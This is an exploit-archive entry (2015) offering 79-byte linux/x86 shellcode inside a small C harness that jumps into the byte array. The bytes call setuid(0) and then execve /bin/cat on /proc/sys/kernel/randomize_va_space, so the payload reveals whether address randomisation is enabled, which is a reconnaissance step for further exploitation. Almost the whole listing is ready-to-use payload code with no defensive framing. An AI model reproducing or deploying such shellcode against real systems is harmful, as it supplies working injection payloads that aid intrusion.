linux/x86 to see /proc/sys/kernel/randomize_va_space - 79 bytes



EKU-ID: 4779 CVE: OSVDB-ID:
Author: Febriyanto Nugroho Published: 2015-04-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
  
 # Exploit Title  : linux/x86 execve("/bin/cat", ["/bin/cat", "/proc/sys/kernel/randomize_va_space"], NULL) - 79 bytes
 # Exploit Author : Febriyanto Nugroho 
 # Tested on      : Linux Debian 5.0.5
  
 */
  
#include <stdio.h>
  
char shellcode[] = "\x31\xdb"
                   "\x6a\x17"
                   "\x58"
                   "\xcd\x80"
                   "\x8d\x43\x0b"
                   "\x99"
                   "\x52"
                   "\x68\x2f\x63\x61\x74"
                   "\x68\x2f\x62\x69\x6e"
                   "\x89\xe3"
                   "\x52"
                   "\x68\x61\x63\x65\x2f"
                   "\x68\x61\x5f\x73\x70"
                   "\x68\x7a\x65\x5f\x76"
                   "\x68\x64\x6f\x6d\x69"
                   "\x68\x2f\x72\x61\x6e"
                   "\x68\x72\x6e\x65\x6c"
                   "\x68\x73\x2f\x6b\x65"
                   "\x68\x63\x2f\x73\x79"
                   "\x68\x2f\x70\x72\x6f"
                   "\x89\xe1"
                   "\x52"
                   "\x51"
                   "\x53"
                   "\x89\xe1"
                   "\xcd\x80";
  
int main(int argc, char **argv) {
asm("jmp %0;" : "=m" (shellcode));  
}